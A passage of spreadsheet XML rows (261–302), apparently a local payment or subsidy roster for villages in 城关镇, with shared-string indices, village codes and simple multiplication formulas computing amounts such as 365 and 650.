      </c>
      <c r="F261" s="17" t="s">
        <v>223</v>
      </c>
      <c r="G261" s="17">
        <v>1</v>
      </c>
      <c r="H261" s="18">
        <v>365</v>
      </c>
      <c r="I261" s="17">
        <f t="shared" si="8"/>
        <v>365</v>
      </c>
      <c r="J261" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K261" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="262" customHeight="1" spans="1:11">
      <c r="A262" s="16" t="s">
        <v>868</v>
      </c>
      <c r="B262" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C262" s="17" t="s">
        <v>869</v>
      </c>
      <c r="D262" s="17" t="s">
        <v>870</v>
      </c>
      <c r="E262" s="17" t="s">
        <v>871</v>
      </c>
      <c r="F262" s="17" t="s">
        <v>223</v>
      </c>
      <c r="G262" s="17">
        <v>1</v>
      </c>
      <c r="H262" s="17">
        <v>400</v>
      </c>
      <c r="I262" s="17">
        <f t="shared" si="8"/>
        <v>400</v>
      </c>
      <c r="J262" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K262" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="263" customHeight="1" spans="1:11">
      <c r="A263" s="16" t="s">
        <v>872</v>
      </c>
      <c r="B263" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C263" s="17" t="s">
        <v>220</v>
      </c>
      <c r="D263" s="17" t="s">
        <v>873</v>
      </c>
      <c r="E263" s="17" t="s">
        <v>874</v>
      </c>
      <c r="F263" s="17" t="s">
        <v>223</v>
      </c>
      <c r="G263" s="17">
        <v>1</v>
      </c>
      <c r="H263" s="18">
        <v>365</v>
      </c>
      <c r="I263" s="17">
        <f t="shared" si="8"/>
        <v>365</v>
      </c>
      <c r="J263" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K263" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="264" customHeight="1" spans="1:11">
      <c r="A264" s="16" t="s">
        <v>875</v>
      </c>
      <c r="B264" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C264" s="17" t="s">
        <v>263</v>
      </c>
      <c r="D264" s="17" t="s">
        <v>876</v>
      </c>
      <c r="E264" s="17" t="s">
        <v>877</v>
      </c>
      <c r="F264" s="17" t="s">
        <v>266</v>
      </c>
      <c r="G264" s="17">
        <v>1</v>
      </c>
      <c r="H264" s="18">
        <v>365</v>
      </c>
      <c r="I264" s="17">
        <f t="shared" si="8"/>
        <v>365</v>
      </c>
      <c r="J264" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K264" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="265" customHeight="1" spans="1:11">
      <c r="A265" s="16" t="s">
        <v>878</v>
      </c>
      <c r="B265" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C265" s="17" t="s">
        <v>230</v>
      </c>
      <c r="D265" s="17" t="s">
        <v>827</v>
      </c>
      <c r="E265" s="17" t="s">
        <v>249</v>
      </c>
      <c r="F265" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G265" s="17">
        <v>1</v>
      </c>
      <c r="H265" s="18">
        <v>365</v>
      </c>
      <c r="I265" s="17">
        <f t="shared" si="8"/>
        <v>365</v>
      </c>
      <c r="J265" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K265" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="266" customHeight="1" spans="1:11">
      <c r="A266" s="16" t="s">
        <v>879</v>
      </c>
      <c r="B266" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C266" s="17" t="s">
        <v>230</v>
      </c>
      <c r="D266" s="17" t="s">
        <v>880</v>
      </c>
      <c r="E266" s="17" t="s">
        <v>306</v>
      </c>
      <c r="F266" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G266" s="17">
        <v>2</v>
      </c>
      <c r="H266" s="18">
        <v>325</v>
      </c>
      <c r="I266" s="17">
        <f t="shared" si="8"/>
        <v>650</v>
      </c>
      <c r="J266" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K266" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="267" customHeight="1" spans="1:11">
      <c r="A267" s="16" t="s">
        <v>881</v>
      </c>
      <c r="B267" s="17" t="str">
        <f>B266</f>
        <v>城关镇</v>
      </c>
      <c r="C267" s="17" t="str">
        <f>C266</f>
        <v>中华村</v>
      </c>
      <c r="D267" s="16" t="s">
        <v>882</v>
      </c>
      <c r="E267" s="16" t="s">
        <v>239</v>
      </c>
      <c r="F267" s="17" t="str">
        <f>F266</f>
        <v>4113210108</v>
      </c>
      <c r="G267" s="17"/>
      <c r="H267" s="17"/>
      <c r="I267" s="17"/>
      <c r="J267" s="17"/>
      <c r="K267" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="268" customHeight="1" spans="1:11">
      <c r="A268" s="16" t="s">
        <v>883</v>
      </c>
      <c r="B268" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C268" s="17" t="s">
        <v>263</v>
      </c>
      <c r="D268" s="17" t="s">
        <v>884</v>
      </c>
      <c r="E268" s="17" t="s">
        <v>236</v>
      </c>
      <c r="F268" s="17" t="s">
        <v>266</v>
      </c>
      <c r="G268" s="17">
        <v>1</v>
      </c>
      <c r="H268" s="18">
        <v>365</v>
      </c>
      <c r="I268" s="17">
        <f>H268*G268</f>
        <v>365</v>
      </c>
      <c r="J268" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K268" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="269" customHeight="1" spans="1:11">
      <c r="A269" s="16" t="s">
        <v>885</v>
      </c>
      <c r="B269" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C269" s="17" t="s">
        <v>286</v>
      </c>
      <c r="D269" s="17" t="s">
        <v>886</v>
      </c>
      <c r="E269" s="17" t="s">
        <v>887</v>
      </c>
      <c r="F269" s="17" t="s">
        <v>289</v>
      </c>
      <c r="G269" s="17">
        <v>1</v>
      </c>
      <c r="H269" s="18">
        <v>365</v>
      </c>
      <c r="I269" s="17">
        <f>H269*G269</f>
        <v>365</v>
      </c>
      <c r="J269" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K269" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="270" customHeight="1" spans="1:11">
      <c r="A270" s="16" t="s">
        <v>888</v>
      </c>
      <c r="B270" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C270" s="17" t="s">
        <v>230</v>
      </c>
      <c r="D270" s="17" t="s">
        <v>889</v>
      </c>
      <c r="E270" s="17" t="s">
        <v>306</v>
      </c>
      <c r="F270" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G270" s="17">
        <v>2</v>
      </c>
      <c r="H270" s="18">
        <v>325</v>
      </c>
      <c r="I270" s="17">
        <f>H270*G270</f>
        <v>650</v>
      </c>
      <c r="J270" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K270" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="271" customHeight="1" spans="1:11">
      <c r="A271" s="16" t="s">
        <v>890</v>
      </c>
      <c r="B271" s="17" t="str">
        <f>B270</f>
        <v>城关镇</v>
      </c>
      <c r="C271" s="17" t="str">
        <f>C270</f>
        <v>中华村</v>
      </c>
      <c r="D271" s="16" t="s">
        <v>891</v>
      </c>
      <c r="E271" s="16" t="s">
        <v>402</v>
      </c>
      <c r="F271" s="17" t="str">
        <f>F270</f>
        <v>4113210108</v>
      </c>
      <c r="G271" s="17"/>
      <c r="H271" s="17"/>
      <c r="I271" s="17"/>
      <c r="J271" s="17"/>
      <c r="K271" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="272" customHeight="1" spans="1:11">
      <c r="A272" s="16" t="s">
        <v>892</v>
      </c>
      <c r="B272" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C272" s="17" t="s">
        <v>318</v>
      </c>
      <c r="D272" s="17" t="s">
        <v>893</v>
      </c>
      <c r="E272" s="17" t="s">
        <v>526</v>
      </c>
      <c r="F272" s="17" t="s">
        <v>223</v>
      </c>
      <c r="G272" s="17">
        <v>1</v>
      </c>
      <c r="H272" s="18">
        <v>365</v>
      </c>
      <c r="I272" s="17">
        <f t="shared" ref="I272:I277" si="9">H272*G272</f>
        <v>365</v>
      </c>
      <c r="J272" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K272" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="273" customHeight="1" spans="1:11">
      <c r="A273" s="16" t="s">
        <v>894</v>
      </c>
      <c r="B273" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C273" s="17" t="s">
        <v>263</v>
      </c>
      <c r="D273" s="17" t="s">
        <v>895</v>
      </c>
      <c r="E273" s="17" t="s">
        <v>584</v>
      </c>
      <c r="F273" s="17" t="s">
        <v>266</v>
      </c>
      <c r="G273" s="17">
        <v>1</v>
      </c>
      <c r="H273" s="18">
        <v>365</v>
      </c>
      <c r="I273" s="17">
        <f t="shared" si="9"/>
        <v>365</v>
      </c>
      <c r="J273" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K273" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="274" customHeight="1" spans="1:11">
      <c r="A274" s="16" t="s">
        <v>896</v>
      </c>
      <c r="B274" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C274" s="17" t="s">
        <v>286</v>
      </c>
      <c r="D274" s="17" t="s">
        <v>897</v>
      </c>
      <c r="E274" s="17" t="s">
        <v>432</v>
      </c>
      <c r="F274" s="17" t="s">
        <v>289</v>
      </c>
      <c r="G274" s="17">
        <v>1</v>
      </c>
      <c r="H274" s="18">
        <v>365</v>
      </c>
      <c r="I274" s="17">
        <f t="shared" si="9"/>
        <v>365</v>
      </c>
      <c r="J274" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K274" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="275" customHeight="1" spans="1:11">
      <c r="A275" s="16" t="s">
        <v>898</v>
      </c>
      <c r="B275" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C275" s="17" t="s">
        <v>286</v>
      </c>
      <c r="D275" s="17" t="s">
        <v>899</v>
      </c>
      <c r="E275" s="17" t="s">
        <v>675</v>
      </c>
      <c r="F275" s="17" t="s">
        <v>289</v>
      </c>
      <c r="G275" s="17">
        <v>1</v>
      </c>
      <c r="H275" s="18">
        <v>365</v>
      </c>
      <c r="I275" s="17">
        <f t="shared" si="9"/>
        <v>365</v>
      </c>
      <c r="J275" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K275" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="276" customHeight="1" spans="1:11">
      <c r="A276" s="16" t="s">
        <v>900</v>
      </c>
      <c r="B276" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C276" s="17" t="s">
        <v>263</v>
      </c>
      <c r="D276" s="17" t="s">
        <v>901</v>
      </c>
      <c r="E276" s="17" t="s">
        <v>521</v>
      </c>
      <c r="F276" s="17" t="s">
        <v>266</v>
      </c>
      <c r="G276" s="17">
        <v>1</v>
      </c>
      <c r="H276" s="18">
        <v>365</v>
      </c>
      <c r="I276" s="17">
        <f t="shared" si="9"/>
        <v>365</v>
      </c>
      <c r="J276" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K276" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="277" customHeight="1" spans="1:11">
      <c r="A277" s="16" t="s">
        <v>902</v>
      </c>
      <c r="B277" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C277" s="17" t="s">
        <v>263</v>
      </c>
      <c r="D277" s="17" t="s">
        <v>903</v>
      </c>
      <c r="E277" s="17" t="s">
        <v>306</v>
      </c>
      <c r="F277" s="17" t="s">
        <v>266</v>
      </c>
      <c r="G277" s="17">
        <v>2</v>
      </c>
      <c r="H277" s="18">
        <v>325</v>
      </c>
      <c r="I277" s="17">
        <f t="shared" si="9"/>
        <v>650</v>
      </c>
      <c r="J277" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K277" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="278" customHeight="1" spans="1:11">
      <c r="A278" s="16" t="s">
        <v>904</v>
      </c>
      <c r="B278" s="17" t="str">
        <f>B277</f>
        <v>城关镇</v>
      </c>
      <c r="C278" s="17" t="str">
        <f>C277</f>
        <v>西北村</v>
      </c>
      <c r="D278" s="16" t="s">
        <v>905</v>
      </c>
      <c r="E278" s="16" t="s">
        <v>239</v>
      </c>
      <c r="F278" s="17" t="str">
        <f>F277</f>
        <v>4113210106</v>
      </c>
      <c r="G278" s="17"/>
      <c r="H278" s="17"/>
      <c r="I278" s="17"/>
      <c r="J278" s="17"/>
      <c r="K278" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="279" customHeight="1" spans="1:11">
      <c r="A279" s="16" t="s">
        <v>906</v>
      </c>
      <c r="B279" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C279" s="17" t="s">
        <v>286</v>
      </c>
      <c r="D279" s="17" t="s">
        <v>907</v>
      </c>
      <c r="E279" s="17" t="s">
        <v>232</v>
      </c>
      <c r="F279" s="17" t="s">
        <v>289</v>
      </c>
      <c r="G279" s="17">
        <v>2</v>
      </c>
      <c r="H279" s="18">
        <v>325</v>
      </c>
      <c r="I279" s="17">
        <f>H279*G279</f>
        <v>650</v>
      </c>
      <c r="J279" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K279" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="280" customHeight="1" spans="1:11">
      <c r="A280" s="16" t="s">
        <v>908</v>
      </c>
      <c r="B280" s="17" t="str">
        <f>B279</f>
        <v>城关镇</v>
      </c>
      <c r="C280" s="17" t="str">
        <f>C279</f>
        <v>北外村</v>
      </c>
      <c r="D280" s="16" t="s">
        <v>909</v>
      </c>
      <c r="E280" s="16" t="s">
        <v>910</v>
      </c>
      <c r="F280" s="17" t="str">
        <f>F279</f>
        <v>4113210102</v>
      </c>
      <c r="G280" s="17"/>
      <c r="H280" s="17"/>
      <c r="I280" s="17"/>
      <c r="J280" s="17"/>
      <c r="K280" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="281" customHeight="1" spans="1:11">
      <c r="A281" s="16" t="s">
        <v>911</v>
      </c>
      <c r="B281" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C281" s="17" t="s">
        <v>263</v>
      </c>
      <c r="D281" s="17" t="s">
        <v>912</v>
      </c>
      <c r="E281" s="17" t="s">
        <v>874</v>
      </c>
      <c r="F281" s="17" t="s">
        <v>266</v>
      </c>
      <c r="G281" s="17">
        <v>1</v>
      </c>
      <c r="H281" s="18">
        <v>365</v>
      </c>
      <c r="I281" s="17">
        <f>H281*G281</f>
        <v>365</v>
      </c>
      <c r="J281" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K281" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="282" customHeight="1" spans="1:11">
      <c r="A282" s="16" t="s">
        <v>913</v>
      </c>
      <c r="B282" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C282" s="17" t="s">
        <v>220</v>
      </c>
      <c r="D282" s="17" t="s">
        <v>914</v>
      </c>
      <c r="E282" s="17" t="s">
        <v>397</v>
      </c>
      <c r="F282" s="17" t="s">
        <v>223</v>
      </c>
      <c r="G282" s="17">
        <v>1</v>
      </c>
      <c r="H282" s="18">
        <v>365</v>
      </c>
      <c r="I282" s="17">
        <f>H282*G282</f>
        <v>365</v>
      </c>
      <c r="J282" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K282" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="283" customHeight="1" spans="1:11">
      <c r="A283" s="16" t="s">
        <v>915</v>
      </c>
      <c r="B283" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C283" s="17" t="s">
        <v>230</v>
      </c>
      <c r="D283" s="17" t="s">
        <v>916</v>
      </c>
      <c r="E283" s="17" t="s">
        <v>584</v>
      </c>
      <c r="F283" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G283" s="17">
        <v>1</v>
      </c>
      <c r="H283" s="18">
        <v>365</v>
      </c>
      <c r="I283" s="17">
        <f>H283*G283</f>
        <v>365</v>
      </c>
      <c r="J283" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K283" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="284" customHeight="1" spans="1:11">
      <c r="A284" s="16" t="s">
        <v>917</v>
      </c>
      <c r="B284" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C284" s="17" t="s">
        <v>230</v>
      </c>
      <c r="D284" s="17" t="s">
        <v>918</v>
      </c>
      <c r="E284" s="17" t="s">
        <v>292</v>
      </c>
      <c r="F284" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G284" s="17">
        <v>1</v>
      </c>
      <c r="H284" s="18">
        <v>365</v>
      </c>
      <c r="I284" s="17">
        <f t="shared" ref="I284:I290" si="10">H284*G284</f>
        <v>365</v>
      </c>
      <c r="J284" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K284" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="285" customHeight="1" spans="1:11">
      <c r="A285" s="16" t="s">
        <v>919</v>
      </c>
      <c r="B285" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C285" s="17" t="s">
        <v>230</v>
      </c>
      <c r="D285" s="17" t="s">
        <v>920</v>
      </c>
      <c r="E285" s="17" t="s">
        <v>269</v>
      </c>
      <c r="F285" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G285" s="17">
        <v>1</v>
      </c>
      <c r="H285" s="18">
        <v>365</v>
      </c>
      <c r="I285" s="17">
        <f t="shared" si="10"/>
        <v>365</v>
      </c>
      <c r="J285" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K285" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="286" customHeight="1" spans="1:11">
      <c r="A286" s="16" t="s">
        <v>921</v>
      </c>
      <c r="B286" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C286" s="17" t="s">
        <v>230</v>
      </c>
      <c r="D286" s="17" t="s">
        <v>922</v>
      </c>
      <c r="E286" s="17" t="s">
        <v>923</v>
      </c>
      <c r="F286" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G286" s="17">
        <v>1</v>
      </c>
      <c r="H286" s="18">
        <v>365</v>
      </c>
      <c r="I286" s="17">
        <f t="shared" si="10"/>
        <v>365</v>
      </c>
      <c r="J286" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K286" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="287" customHeight="1" spans="1:11">
      <c r="A287" s="16" t="s">
        <v>924</v>
      </c>
      <c r="B287" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C287" s="17" t="s">
        <v>230</v>
      </c>
      <c r="D287" s="17" t="s">
        <v>925</v>
      </c>
      <c r="E287" s="17" t="s">
        <v>249</v>
      </c>
      <c r="F287" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G287" s="17">
        <v>1</v>
      </c>
      <c r="H287" s="18">
        <v>365</v>
      </c>
      <c r="I287" s="17">
        <f t="shared" si="10"/>
        <v>365</v>
      </c>
      <c r="J287" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K287" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="288" customHeight="1" spans="1:11">
      <c r="A288" s="16" t="s">
        <v>926</v>
      </c>
      <c r="B288" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C288" s="17" t="s">
        <v>230</v>
      </c>
      <c r="D288" s="17" t="s">
        <v>927</v>
      </c>
      <c r="E288" s="17" t="s">
        <v>239</v>
      </c>
      <c r="F288" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G288" s="17">
        <v>1</v>
      </c>
      <c r="H288" s="17">
        <v>450</v>
      </c>
      <c r="I288" s="17">
        <f t="shared" si="10"/>
        <v>450</v>
      </c>
      <c r="J288" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K288" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="289" customHeight="1" spans="1:11">
      <c r="A289" s="16" t="s">
        <v>928</v>
      </c>
      <c r="B289" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C289" s="17" t="s">
        <v>220</v>
      </c>
      <c r="D289" s="17" t="s">
        <v>929</v>
      </c>
      <c r="E289" s="17" t="s">
        <v>340</v>
      </c>
      <c r="F289" s="17" t="s">
        <v>223</v>
      </c>
      <c r="G289" s="17">
        <v>1</v>
      </c>
      <c r="H289" s="18">
        <v>365</v>
      </c>
      <c r="I289" s="17">
        <f t="shared" si="10"/>
        <v>365</v>
      </c>
      <c r="J289" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K289" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="290" customHeight="1" spans="1:11">
      <c r="A290" s="16" t="s">
        <v>930</v>
      </c>
      <c r="B290" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C290" s="17" t="s">
        <v>230</v>
      </c>
      <c r="D290" s="17" t="s">
        <v>931</v>
      </c>
      <c r="E290" s="17" t="s">
        <v>761</v>
      </c>
      <c r="F290" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G290" s="17">
        <v>2</v>
      </c>
      <c r="H290" s="18">
        <v>325</v>
      </c>
      <c r="I290" s="17">
        <f t="shared" si="10"/>
        <v>650</v>
      </c>
      <c r="J290" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K290" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="291" customHeight="1" spans="1:11">
      <c r="A291" s="16" t="s">
        <v>932</v>
      </c>
      <c r="B291" s="17" t="str">
        <f>B290</f>
        <v>城关镇</v>
      </c>
      <c r="C291" s="17" t="str">
        <f>C290</f>
        <v>中华村</v>
      </c>
      <c r="D291" s="16" t="s">
        <v>933</v>
      </c>
      <c r="E291" s="16" t="s">
        <v>923</v>
      </c>
      <c r="F291" s="17" t="str">
        <f>F290</f>
        <v>4113210108</v>
      </c>
      <c r="G291" s="17"/>
      <c r="H291" s="17"/>
      <c r="I291" s="17"/>
      <c r="J291" s="17"/>
      <c r="K291" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="292" customHeight="1" spans="1:11">
      <c r="A292" s="16" t="s">
        <v>934</v>
      </c>
      <c r="B292" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C292" s="17" t="s">
        <v>263</v>
      </c>
      <c r="D292" s="17" t="s">
        <v>935</v>
      </c>
      <c r="E292" s="17" t="s">
        <v>773</v>
      </c>
      <c r="F292" s="17" t="s">
        <v>266</v>
      </c>
      <c r="G292" s="17">
        <v>1</v>
      </c>
      <c r="H292" s="18">
        <v>365</v>
      </c>
      <c r="I292" s="17">
        <f>H292*G292</f>
        <v>365</v>
      </c>
      <c r="J292" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K292" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="293" customHeight="1" spans="1:11">
      <c r="A293" s="16" t="s">
        <v>936</v>
      </c>
      <c r="B293" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C293" s="17" t="s">
        <v>263</v>
      </c>
      <c r="D293" s="17" t="s">
        <v>937</v>
      </c>
      <c r="E293" s="17" t="s">
        <v>306</v>
      </c>
      <c r="F293" s="17" t="s">
        <v>266</v>
      </c>
      <c r="G293" s="17">
        <v>2</v>
      </c>
      <c r="H293" s="18">
        <v>325</v>
      </c>
      <c r="I293" s="17">
        <f>H293*G293</f>
        <v>650</v>
      </c>
      <c r="J293" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K293" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="294" customHeight="1" spans="1:11">
      <c r="A294" s="16" t="s">
        <v>938</v>
      </c>
      <c r="B294" s="17" t="str">
        <f>B293</f>
        <v>城关镇</v>
      </c>
      <c r="C294" s="17" t="str">
        <f>C293</f>
        <v>西北村</v>
      </c>
      <c r="D294" s="16" t="s">
        <v>939</v>
      </c>
      <c r="E294" s="16" t="s">
        <v>320</v>
      </c>
      <c r="F294" s="17" t="str">
        <f>F293</f>
        <v>4113210106</v>
      </c>
      <c r="G294" s="17"/>
      <c r="H294" s="17"/>
      <c r="I294" s="17"/>
      <c r="J294" s="17"/>
      <c r="K294" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="295" customHeight="1" spans="1:11">
      <c r="A295" s="16" t="s">
        <v>940</v>
      </c>
      <c r="B295" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C295" s="17" t="s">
        <v>286</v>
      </c>
      <c r="D295" s="17" t="s">
        <v>941</v>
      </c>
      <c r="E295" s="17" t="s">
        <v>239</v>
      </c>
      <c r="F295" s="17" t="s">
        <v>289</v>
      </c>
      <c r="G295" s="17">
        <v>1</v>
      </c>
      <c r="H295" s="18">
        <v>365</v>
      </c>
      <c r="I295" s="17">
        <f t="shared" ref="I295:I301" si="11">H295*G295</f>
        <v>365</v>
      </c>
      <c r="J295" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K295" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="296" customHeight="1" spans="1:11">
      <c r="A296" s="16" t="s">
        <v>942</v>
      </c>
      <c r="B296" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C296" s="17" t="s">
        <v>263</v>
      </c>
      <c r="D296" s="17" t="s">
        <v>278</v>
      </c>
      <c r="E296" s="17" t="s">
        <v>943</v>
      </c>
      <c r="F296" s="17" t="s">
        <v>266</v>
      </c>
      <c r="G296" s="17">
        <v>1</v>
      </c>
      <c r="H296" s="18">
        <v>365</v>
      </c>
      <c r="I296" s="17">
        <f t="shared" si="11"/>
        <v>365</v>
      </c>
      <c r="J296" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K296" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="297" customHeight="1" spans="1:11">
      <c r="A297" s="16" t="s">
        <v>944</v>
      </c>
      <c r="B297" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C297" s="17" t="s">
        <v>263</v>
      </c>
      <c r="D297" s="17" t="s">
        <v>945</v>
      </c>
      <c r="E297" s="17" t="s">
        <v>946</v>
      </c>
      <c r="F297" s="17" t="s">
        <v>266</v>
      </c>
      <c r="G297" s="17">
        <v>1</v>
      </c>
      <c r="H297" s="18">
        <v>365</v>
      </c>
      <c r="I297" s="17">
        <f t="shared" si="11"/>
        <v>365</v>
      </c>
      <c r="J297" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K297" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="298" customHeight="1" spans="1:11">
      <c r="A298" s="16" t="s">
        <v>947</v>
      </c>
      <c r="B298" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C298" s="17" t="s">
        <v>263</v>
      </c>
      <c r="D298" s="17" t="s">
        <v>948</v>
      </c>
      <c r="E298" s="17" t="s">
        <v>265</v>
      </c>
      <c r="F298" s="17" t="s">
        <v>266</v>
      </c>
      <c r="G298" s="17">
        <v>1</v>
      </c>
      <c r="H298" s="18">
        <v>365</v>
      </c>
      <c r="I298" s="17">
        <f t="shared" si="11"/>
        <v>365</v>
      </c>
      <c r="J298" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K298" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="299" customHeight="1" spans="1:11">
      <c r="A299" s="16" t="s">
        <v>949</v>
      </c>
      <c r="B299" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C299" s="17" t="s">
        <v>286</v>
      </c>
      <c r="D299" s="17" t="s">
        <v>950</v>
      </c>
      <c r="E299" s="17" t="s">
        <v>432</v>
      </c>
      <c r="F299" s="17" t="s">
        <v>289</v>
      </c>
      <c r="G299" s="17">
        <v>1</v>
      </c>
      <c r="H299" s="18">
        <v>365</v>
      </c>
      <c r="I299" s="17">
        <f t="shared" si="11"/>
        <v>365</v>
      </c>
      <c r="J299" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K299" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="300" customHeight="1" spans="1:11">
      <c r="A300" s="16" t="s">
        <v>951</v>
      </c>
      <c r="B300" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C300" s="17" t="s">
        <v>286</v>
      </c>
      <c r="D300" s="17" t="s">
        <v>952</v>
      </c>
      <c r="E300" s="17" t="s">
        <v>239</v>
      </c>
      <c r="F300" s="17" t="s">
        <v>289</v>
      </c>
      <c r="G300" s="17">
        <v>1</v>
      </c>
      <c r="H300" s="18">
        <v>365</v>
      </c>
      <c r="I300" s="17">
        <f t="shared" si="11"/>
        <v>365</v>
      </c>
      <c r="J300" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K300" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="301" customHeight="1" spans="1:11">
      <c r="A301" s="16" t="s">
        <v>953</v>
      </c>
      <c r="B301" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C301" s="17" t="s">
        <v>230</v>
      </c>
      <c r="D301" s="17" t="s">
        <v>954</v>
      </c>
      <c r="E301" s="17" t="s">
        <v>955</v>
      </c>
      <c r="F301" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G301" s="17">
        <v>3</v>
      </c>
      <c r="H301" s="18">
        <v>290</v>
      </c>
      <c r="I301" s="17">
        <f t="shared" si="11"/>
        <v>870</v>
      </c>
      <c r="J301" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K301" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="302" customHeight="1" spans="1:11">
      <c r="A302" s="16" t="s">
        <v>956</v>
      </c>
      <c r="B302" s="17" t="str">
        <f>B301</f>
        <v>城关镇</v>
      </c>
